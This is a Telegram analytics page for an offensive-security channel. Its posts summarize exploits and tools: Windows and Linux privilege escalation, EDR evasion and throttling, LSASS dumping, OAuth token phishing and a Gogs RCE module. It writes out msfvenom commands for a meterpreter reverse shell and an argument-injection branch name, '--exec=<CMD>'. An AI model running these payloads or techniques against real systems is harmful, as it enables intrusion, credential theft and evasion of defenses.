¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
reconcore
Ir al canal en Telegram
#vulnerability #research #cve #rce #lpe #poc #tools #pentest #redteam #blueteam #offensivesecurity #technique #methods Educational use only. Content from public sources. Admin holds no liability for misuse. Users are solely responsible for their actions.
Mostrar más2 161
Suscriptores
+324 horas
+137 días
+6030 días
Carga de datos en curso...
Canales Similares
Nube de Etiquetas
Menciones Entrantes y Salientes
---
---
---
---
---
---
Atraer Suscriptores
junio '26
junio '26
+28
en 0 canales
mayo '26
+92
en 1 canales
Get PRO
abril '26
+89
en 2 canales
Get PRO
marzo '26
+116
en 1 canales
Get PRO
febrero '26
+145
en 1 canales
Get PRO
enero '26
+157
en 2 canales
Get PRO
diciembre '25
+317
en 3 canales
Get PRO
noviembre '25
+170
en 0 canales
Get PRO
octubre '25
+216
en 1 canales
Get PRO
septiembre '25
+125
en 2 canales
Get PRO
agosto '25
+118
en 5 canales
Get PRO
julio '25
+96
en 2 canales
Get PRO
junio '25
+51
en 1 canales
Get PRO
mayo '25
+68
en 3 canales
Get PRO
abril '25
+117
en 2 canales
Get PRO
marzo '25
+84
en 1 canales
Get PRO
febrero '25
+108
en 1 canales
Get PRO
enero '25
+73
en 2 canales
Get PRO
diciembre '24
+4
en 0 canales
Get PRO
noviembre '24
+127
en 0 canales
Get PRO
octubre '24
+38
en 0 canales
Get PRO
septiembre '24
+37
en 0 canales
Get PRO
agosto '24
+328
en 0 canales
Get PRO
julio '240
en 0 canales
Get PRO
junio '24
+15
en 1 canales
| Fecha | Crecimiento de Suscriptores | Menciones | Canales | |
| 11 junio | +3 | |||
| 10 junio | +3 | |||
| 09 junio | +3 | |||
| 08 junio | +1 | |||
| 07 junio | +4 | |||
| 06 junio | +1 | |||
| 05 junio | +1 | |||
| 04 junio | +4 | |||
| 03 junio | 0 | |||
| 02 junio | +6 | |||
| 01 junio | +2 |
Publicaciones del Canal
| 2 |  RoguePlanet
Windows Defender LPE. The exploit is a race condition, so it's a hit or miss. I have managed to get a 100% success rate on some machines while it struggled to work on others. The exploit has been tested in Windows 11 (Official channel + Canary) and Windows 10 with june 2026 patch installed. The PoC however does not work in Windows Server since standard users cannot mount an ISO image, I'm confident that all Windows Server versions are vulnerable as well, you just need to redesign the exploit.
#vulnerability #race_condition #lpe #poc @reconcore | 239 |
| 3 | BOF Cocktails in Cobalt Strike: Instrumenting BOFs with BEACON_INLINE_EXECUTE and Crystal Palace
Original text: “BOF Cocktails in Cobalt Strike” — Rasta Mouse, rastamouse.me (05 Jun 2026). Code blocks and the screenshot below are reproduced verbatim from the source with attribution.
Post-exploitation Beacon Object Files (BOFs) historically inherited their evasion posture from whatever agent or loader executed them. If the loader took care of unhooking, masking,…
#redteam #bof @reconcore | 262 |
| 4 |  QuadRF lets you directly explore the RF environment around you. See where signals are, the way they propagate, and how antennas and the surrounding environment interact. At 30 fps, you can map WiFi devices in a room, quadcopters in the sky, or other wireless transmitters. Expanding beyond vision and LiDAR, your robots can use QuadRF to gain real-time spatial awareness of surrounding radio beacons and access points.
#rf #sdr @reconcore | 252 |
| 5 | DLL Hijacking Vulnerability Scanner
SearchAvailableExe is a comprehensive security research tool designed to identify and analyze DLL hijacking vulnerabilities in Windows executable files. This tool systematically scans signed executables to find potential DLL hijacking opportunities, making it valuable for security researchers, penetration testers, and system administrators.
#pe #re #dll #injection #analysis #binary #vulnerability #scanner #hijacking #security #research @reconcore | 260 |
| 6 |  FirewallXPL-Forge
Perimeter security exploitation framework — 164 modules covering FW, NGFW, UTM, WAF, VPN, NAC, LB, and OT/ICS firewalls (Fortinet, Cisco, Palo Alto, F5, Citrix, Check Point, SonicWall, Ivanti, Siemens, Moxa, +13 vendors). GPU-accelerated, ML-driven, async concurrency, Rich TUI.
#python #firewall #penetration_testing #pentest #ngfw #exploitation #framework #redteam #ics #security #vulnerability #scanner #waf #bypass #vpn #exploit #ot @reconcore | 267 |
| 7 | Shellcode-EDR-Evasion-Loader
shellcode loader with XOR encryption and EDR evasion techniques. for security research and authorized testing only.
payload:
msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o payload.bin
reverse shell:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=_ LPORT=_ -f raw -o payload.bin
#shellcode #loader #windows #security #edr #evasion @reconcore | 296 |
| 8 |  c2detect
C2 server fingerprinter — Cobalt Strike, Sliver, Mythic, Havoc, Brute Ratel
cognis.digital #python #cli #automation #infosec #pentest #offensivesecurity #redteam @reconcore | 367 |
| 9 | EDRChoker
Client–server EDRs have an inherent weakness: they must maintain server connectivity to be effective. When isolated from their server they lose much of their capability, and administrators can no longer collect or monitor logs from those agents. EDRChoker uses policy-based Quality of Service (QoS) to throttle EDR agents to the lowest bandwidth; when agents attempt to connect they will consistently time out due to the extremely low bandwidth.
Blog: https://www.zerosalarium.com/2026/06/edrchoker-choking-telemetry-stream-block-edr.html
In this article I present a technique for interfering with the client–server connection of an EDR. It’s different from EDR connection-blocking methods that use the Windows Firewall or the Windows Filtering Platform (WFP). | 387 |
| 10 | CVE-2026-0826: Unauthenticated stack buffer overflow in HP Poly VVX and Trio VoIP Phones (RCE as root)
Vulnerable: VVX 150, VVX 250, VVX 350, and VVX 450), as well as Trio IP Conference series (Trio 8800, Trio 8500, and Trio 8300).
Blog: https://www.rapid7.com/blog/post/ve-cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-hp-poly-vvx-trio-voip-phones-fixed/ | 382 |
| 11 | Hidden HTTP/2 Bomb
*
FOR nginx, Apache httpd, Microsoft IIS, Envoy, Cloudflare Pingora
*
WriteUP + LABs + PoCs | 523 |
| 12 | DarkReplica (CVE-2026-23631)
Redis Post-Auth RCE Exploit
The full technical writeup can be found here: https://www.zeroday.cloud/blog/redis-cve-2026-23631-dark-replica
#cve #redis #technique #rce @reconcore | 521 |
| 13 | One Click, One Hash: Unpatched NTLM Coercion in Windows Search URI Handler
Original text by Andrew Schwartz
Key Takeaways
Same bug class. No CVE. No fix. The NTLM coercion primitive in the Windows search: URI handler is technically identical to CVE-2026-33829 in the Snipping Tool. Same severity rating, same mechanism, same potential impact. Microsoft closed it without a CVE or a patch, describing its triage process as…
https://core-jmp.org/2026/06/one-click-one-hash-unpatched-ntlm-coercion-in-windows-search-uri-handler/ | 498 |
| 14 | ssh-keysign-pwn — CVE-2026-46333
A critical race condition flaw in pre-31e62c2ebbfd Linux kernels. Due to a window during process exit where the memory management structure is cleared before file descriptors are closed, an unprivileged user can use pidfd_getfd(2) to steal open file descriptors of privileged processes, enabling unauthorized reading of root-owned files.
🔗 Exploit:
https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn
🔗 Source:
https://blog.qualys.com/vulnerabilities-threat-research/2026/05/20/cve-2026-46333-local-root-privilege-escalation-and-credential-disclosure-in-the-linux-kernel-ptrace-path
#linux #kernel #privesc #racecondition #pidfd | 543 |
| 15 | CVE-2026-41089
Windows Netlogon Remote Code Execution via CLDAP Stack Buffer Overflow
CVSS 9.8 CRITICAL
#vulnerability #rce #cldap #poc @reconcore | 547 |
| 16 | MalGitApp
A simple OAuth App designed to capture OAuth tokens when users authenticate through GitHub OAuth flow.
The Phishy GitHub Issue Case
Developers have become a primary target for threat actors. The reason is simple and can be easily understood : they are the backbone of software you are using. They are the one publishing code that will execute on your machine when developing, in your CI/CD pipelines and on the servers in production. This type of attack is called “Supply Chain Attack”, where the attackers target the suppliers in order to compromise organizations or individuals. Basically, they compromise the third-parties to reach their main target (or hit at scale). Some of the recent examples of such attacks are involving Axios and LiteLLM with their 100M downloads per week each.
#phishing #oauth @reconcore | 608 |
| 17 | BYOVD and Looting LSASS in the Modern EDR Era
In today’s post, we will be uncovering the internals of kernel driver vulnerabilities and how to leverage them via the BYOVD (Bring Your Own Vulnerable Driver) method of attack. We will use kernel access to disable PPL for the LSASS process and then proceed to dump the process to disk, XOR’ing it beforehand so it avoids detection by popular EDR solutions.
https://github.com/g3tsyst3m/CodefromBlog/tree/main/2026-5-29-BYOVD%20and%20Looting%20LSASS%20in%20the%20Modern%20EDR%20Era | 531 |
| 18 |  EDR Tradecraft: Internals, Detection, Evasion & Advanced Research
Technical reference on modern EDR architecture, detection mechanisms, evasion techniques, and reverse-engineering methodology. Covers kernel callback APIs, file-system mini-filters, ETW providers, the four detection-engine model, syscall gates (FreshyCalls, RecycledGate, SysWhispers4, Acheron, Sysplant), sleep obfuscation (Ekko, FOLIAGE, DreamWalkers), call-stack spoofing (SilentMoonwalk, VulcanRaven), ETW-TI hardware-breakpoint bypass, patchless AMSI bypass via VEH, BYOVD against the vulnerable-driver blocklist, and the eight-phase EDR research methodology.
#research #technique #methods #re #evasion #edr @reconcore | 579 |
| 19 |  metasploit-framework Add Gogs rebase RCE exploit module
Adds an exploit module for an argument injection vulnerability in the pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev).
The Merge() function in internal/database/pull.go passes the PR base branch name to git rebase without a -- separator. A branch named --exec=<CMD> is parsed by Git as the --exec flag rather than a positional argument, causing sh -c <CMD> to run after each replayed commit during the rebase.
Authenticated RCE via Argument Injection in Gogs
Rapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical).
#vulnerability #rce #metasploit #exploit @reconcore | 538 |
| 20 | metasploit-framework Add Gogs rebase RCE exploit module
Adds an exploit module for an argument injection vulnerability in the pull request merge flow of Gogs (<= 0.14.2 and 0.15.0+dev).
The Merge() function in internal/database/pull.go passes the PR base branch name to git rebase without a -- separator. A branch named --exec=<CMD> is parsed by Git as the --exec flag rather than a positional argument, causing sh -c <CMD> to run after each replayed commit during the rebase.
Authenticated RCE via Argument Injection in Gogs
Rapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSSv4 9.4 (Critical).
#vulnerabilities #rce #metasploit #exploit @reconcore | 6 |
